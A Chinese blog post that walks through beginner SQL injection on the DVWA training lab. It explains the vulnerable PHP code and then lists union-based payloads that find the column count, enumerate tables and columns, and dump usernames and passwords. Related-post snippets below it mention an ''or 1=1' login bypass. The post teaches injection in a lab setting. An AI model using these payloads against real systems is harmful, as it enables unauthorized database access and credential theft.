sql 赋值 null_sql注入初级

最新推荐文章于 2023-06-06 15:02:04 发布
最新推荐文章于 2023-06-06 15:02:04 发布
阅读量507 收藏
点赞数
文章标签: sql 赋值 null
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28728265/article/details/113319987
版权

理论:

SQL Injection:通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

什么时候可能发生SQL Injection

假设我们在浏览器中输入URL www.sample.com,由于它只是对页面的简单请求无需对数据库动进行动态请求,所以它不存在SQL Injection,当我们输入www.sample.com?testid=23时,我们在URL中传递变量testid,并且提供值为23,由于它是对数据库进行动态查询的请求(其中?testid=23表示数据库查询变量),所以我们可以该URL中嵌入恶意SQL语句。

实践:

打开DVWA,改到low级别

0d76a0341d824ef97ba7e85360c4231f.png

先分析一下源代码,点击View Source获取源代码

8f5f396c87eb6f4ea0fba2ec07119239.png

1当在User ID中输入1时,代码如下,php代码分析

7e40a15796c407760a1d2267bdd906e4.png

先检查一下User Id 是否为空,如果为空执行下列操作,先赋值id,之后再数据库中查询数据,将结果输出给result,从结果集中取得一行关联数组赋值到row,依次输出first name,sunname。最后关闭函数。

2函数分析:

(1)Isset()函数:

isset() 函数用于检测变量是否已设置并且非 NULL。

如果已经使用 unset() 释放了一个变量之后,再通过 isset() 判断将返回 FALSE。

若使用 isset() 测试一个被设置成 NULL 的变量,将返回 FALSE。

同时要注意的是 null 字符("\0")并不等同于 PHP 的 NULL 常量。

语法

bool isset ( mixed $var [, mixed $... ] )

参数说明:

$var:要检测的变量。

如果一次传入多个参数,那么 isset() 只有在全部参数都被设置时返回 TRUE,计算过程从左至右,中途遇到没有设置的变量时就会立即停止。

返回值

如果指定变量存在且不为 NULL,则返回 TRUE,否则返回 FALSE。

0a76ea9a3339ed5f74f2d27a0ced7160.png

(2)mysqli_query()函数

定义和用法

mysqli_query() 函数执行某个针对数据库的查询。

语法

mysqli_query(connection,query,resultmode);

0ca33a8de649ab46bd1c6516a25b1bd5.png

5691516f0ea3c5a681de5c96f9f35745.png

(3)die()函数

定义和用法

die() 函数输出一条消息,并退出当前脚本。

该函数是 exit() 函数的别名。

语法

die(message)

245a46bdde67ccb5eb0a67543c73c96b.png

(4)GLOBALS全局变量

     GLOBALS — 引用全局作用域中可用的全部变量

 (5)mysqli()函数

     详情请看https://www.runoob.com/php/php-ref-mysqli.html

3进行实际操作

判断sql语句查询列数

输入1' order by 1#   显示存在

529a29604aceb3ffaf5e691903ce0a82.png

输入1' order by 2#    显示存在
输入1' order by 3#    出错

所以说有两列

1’ union select 1,2#用来查询数据的位置

842e6901de1cb57f146589753981ca41.png

获取数据库名

1' union select database(),2#

获取表名

1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#

获取表的列名

1' union select group_concat(column_name),2 from information_schema.columns     where table_name='users'#

获取数据

1' union select group_concat(user),group_concat(password) from users#

b01e8751c077e376313b0cd1938ad662.png

本文介绍的是初级SQL注入,将持续更新SQL注入中级,高级以及盲注,欢迎大家点赞和收藏,您的支持是我创作的最大动力!

汽车来找茬
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL Server CASE语句关于Null的处理
12-14
 从数据表选择一个字段“field”,如果“field”值是1或NULL赋值为1,其它情况为0,该怎么写啊?这样写对不对啊?  (CASE field  WHEN '1' THEN '1'  WHEN NULL THEN '1'  ELSE '0' END  ) AS field ...
关于MySQL向已存在数据的表添加新列及非空约束 (NOT NULL)的注意事项,空字符串和空值Null区别;
java_mao9的博客
06-20 5538
非空约束(NOT NULL)| 唯一约束(UNIQUE) 空字符串 ’ ’ 和 空值 NULL 有区别 向数据表已存在列添加非空约束 则该列所有值不能为空值,必须在插入值后才能 添加 非空约束,如果想保留空值,可以用将空值NULL 修改为空字符串 ’ '后添加非空约束。 1.使用sql语句创建Test表 Testid 为主键自增 Test1 只添加了唯一约束 2.向表添加数据 ...
sqlserver 字段为null字段追加数据
HiNet
11-05 1453
今天在开发修改bug过程遇到一个数据库问题,很简单但是有容易忽略。记下来以示提醒! sqlserver数据库当字段值为null追加数据要先转换一下默认值否则会导致追加数据失败。 例如:update table1 set field1=isnull(field1,'')+'追加内容' where id=000
GridView控件数据绑定
sir_hanhanhan的博客
10-21 556
GridView平常在编辑列绑定数据 数据少的话用这种方法 还是比较简单的,但倘若你的数据库数据比较多的话,最好还是选择数据源进行数据绑定 首先选择数据源然后新建数据源之后选择数据库点击确定 新建连接 输入数据库名之后选择数据库名称点击确定 之后开始编写你要查询的数据 如果你要绑定的数据源比较多的话 我还是比较倾向这种 ...
sql 语句nvl()用法
热门推荐
山中有石为玉
11-06 1万+
nvl:一个空值转换函数 nvl(表达式1,表达式2) 如果表达式1为空值,nvl返回值为表达式2的值,否则返回表达式1的值。 该函数的目的是把一个空值(null)转换成一个实际的值。 其表达式的值可以是数字型、字符型和日期型。但是表达式1和表达式2的数据类型必须为同一个类型。 ...
Sql查询给字段为null赋值
m0_62929897的博客
11-13 2329
.
sqlserver存储过程SELECT 与 SET 对变量赋值的区别
12-15
SQL Server推荐使用 SET 而不是 SELECT 对变量进行赋值。当表达式返回一个值并对一个变量进行赋值,推荐使用 SET 方法。下表列出 SET 与 SELECT 的区别。请特别注意红色部分。   set select 同对多个变量...
LINQ_to_SQL语法及实例大全
09-16
LINQ to SQL语句(14)之Null语义和DateTime 49 Null语义 49 1.Null 49 2.Nullable<T>.HasValue 50 日期函数 50 1.DateTime.Year 51 2.DateTime.Month 51 3.DateTime.Day 51 LINQ to SQL语句(15)之String 51 字符串...
MySQL NULL 值处理
12-16
我们已经知道 MySQL 使用 SQL SELECT 命令及 WHERE 子句来读取数据表的数据,但是当提供的查询条件字段为 NULL ,该命令可能就无法正常工作。 为了处理这种情况,MySQL提供了三大运算符: IS NULL: 当列的值是 ...
数据库作业9:SQL练习6 – INSERT / UPDATE / DELETE / NULL / VIEW
12-14
【3.69】将一个新学生元组插入到Student表...INTO后只是指出了表名,没有属性列,这表示将在这个表的所有属性列上赋值,顺序与表列的顺序一致,要保证插入数据与表的属性列一一对应。 【3.71】插入一条选课记录 IN
在进行sql语句插入的候,提示:不能将值 NULL 插入列 ‘备注‘,表 ‘Test0417.dbo.tb_举例‘;列不允许有 Null 值。INSERT 失败。
最新发布
chentiebo的博客
06-06 3080
首先查看表设计,表设计不允许为空,当为空的候,禁止插入数据,所以应该在SQL Server插入数据的候为空,默认添加为默认值,从而解决为空的候不能插入数据的问题
sql server 需要赋null 值,如何赋值?‘‘等于 null 么?null值如何在数据记录显示,是否可在客户端配置?
qq_22425887的博客
01-30 2136
sql server 需要赋null 值,如何赋值?‘‘等于 null 么?null值如何在数据记录显示,是否可在客户端配置?
使用带参数的sql语句向数据库插入null
以梦为马 不负韶华
09-23 6196
向数据库插入null值,不能直接使用C#null,必须使用DBNull.Value int?height = textBox3.Text.Trim().lengeth==0?null:(int?)Convert.ToInt32(textBox3.text.trim()); Sqlparameter [ ] pms = new Sqlparameter[ ]{ new  Sqlparam...
SQL注入 空格转换为空绕过
m_de_g的博客
12-09 1539
SQL注入 空格转换为空绕过 一、基础知识 1.preg_replace函数 preg_replace(mixed $pattern,mixed $replacement,mixed $subject):执行一个正则表达式的搜索和替换。 $pattern:要搜索的模式,可以是字符串或一个字符串数组 $replacement:用于替换的字符串或字符串组。 $subject:要搜索替换的目标字符串或字符串数组 function blacklist($id) { $id= preg_replace('/or/
SQL注入问题
weixin_42030357的博客
06-24 260
SQL注入的理解: 以JSP+SQL Server环境为例,对于一个正常的登录表单,输入正确的账号和密码之后,JSP程序会查询数据库:如果存在此用户并且密码正确,将会成功登录;如果用户不存在或者密码不正确,则会提示账号或密码错误。 然而当输入用户名: ‘or 1=1–,密码为空,却发现可以正常登录,显然数据库不存在这样一个用户。 注意:mySQL是#,而oracle是–。表示注释,在–后面...
sql 数据插入, 数据为 null
dingxingmei的专栏
04-27 2136
use test   insert    into product   select *  from testp ---- product 的数据 testp arrivalNo  bit类型    和 product arrivalNo 的nvarchar(50) 数据类型不一致。。   这种数据类型不一致,插入语句执行也是成功。。。。  !! 数据插入
SQL操作-给null字段添加内容
weixin_45863084的博客
10-31 1368
使用update给mysql字段空内容填值
Sql Server数据库在表输入null值的方法!(快捷键)
系统运维
02-06 2449
在表编辑状态,鼠标移到字段单元格,按Ctrl+0键即可输入!
SQL注入以及解决方法
阳young的博客
01-26 7420
目录 SQL注入: 用例子说明: 1.创建user表,其有三个字段,分别是id(有自增功能), username, password。并插入三条数据。 2.将数据库和Java连接并进行登录测试 3.运行代码:​ ​​这就是SQL注入的现象, 为什么会出现这样的现象? 那我们怎么该避免这种情况呢?这候就需要用到PreparedStatement对象。 SQL注入: 由于jdbc程序在执行的过程sql语句在拼接使用了由页面传入参数。如果用户恶意传入一些sql的特殊关键字,就会.
sqlnull 赋值
03-26
SQL ,可以使用关键字 `NULL` 来表示空值。如果要给一个列赋空值,可以使用 `UPDATE` 语句,例如: ``` UPDATE table_name SET column_name = NULL WHERE condition; ``` 其,`table_name` 是表名,`column...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值